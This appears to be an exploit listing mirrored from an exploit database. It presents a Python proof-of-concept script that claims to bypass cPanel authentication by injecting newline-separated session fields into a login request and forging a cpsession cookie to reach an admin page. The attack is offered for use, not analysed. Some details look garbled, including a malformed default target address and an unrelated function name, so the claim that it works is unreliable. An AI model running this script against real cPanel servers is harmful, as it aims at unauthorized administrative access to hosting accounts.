Share
## https://sploitus.com/exploit?id=PACKETSTORM:220249
==================================================================================================================================
    | # Title     : cPanel versions after 11.40 Authentication Manipulation Session Injection                                        |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.cpanel.net                                                                                           |
    ==================================================================================================================================
    
    [+] Summary    : This Python script attempts to an authentication bypass against a web login endpoint by crafting a modified login request and manipulating session-related data.
    
    [+] POC   :  
    
    
    import requests
    import urllib3
    import sys
    import time
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    def final_badr_bank_bypass(target):
        target = target.rstrip('/')
        login_url = f"{target}/login/"
        magic_token = "indoushka"
    
        server_ts = int(time.time())
    
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/125.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
        }
    
        payload = (
            f"user=admin\ncp_security_token={magic_token}\n"
            f"tfa_verified=1\nsuccessful_external_auth_with_timestamp={server_ts}"
            f"&pass=security_audit_2026"
        )
    
        print(f"[*] Target: {target} | Attempting to exploit Status 200...")
    
        try:
            session = requests.Session()
    
            inject_resp = session.post(login_url, data=payload, headers=headers, verify=False)
            print(f"[+] Injection Step: {inject_resp.status_code}")
    
            session.cookies.set("cpsession", f":{magic_token}", domain=target.split('//')[-1].split(':')[0])
    
            admin_url = f"{target}/cpsess{magic_token}/main.html"
            print(f"[*] Accessing Admin Area with injected session: {admin_url}")
            
            final_resp = session.get(admin_url, verify=False, timeout=10, allow_redirects=True)
    
            if final_resp.status_code == 200:
                print("[!!!] SUCCESS:Session Promotion Achieved!")
            elif "Invalid" in final_resp.text or final_resp.status_code == 401:
                print("[-] Promotion Denied: Session is poisoned but integrity check rejected it.")
            else:
                print(f"[-] Final Status: {final_resp.status_code}. (Possible WAF interference)")
    
        except Exception as e:
            print(f"[X] Error: {e}")
    
    if __name__ == "__main__":
        target_addr = sys.argv[1] if len(sys.argv) > 1 else "https://cpanel.127.0.0.1dz:2083"
        final_badr_bank_bypass(target_addr)
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================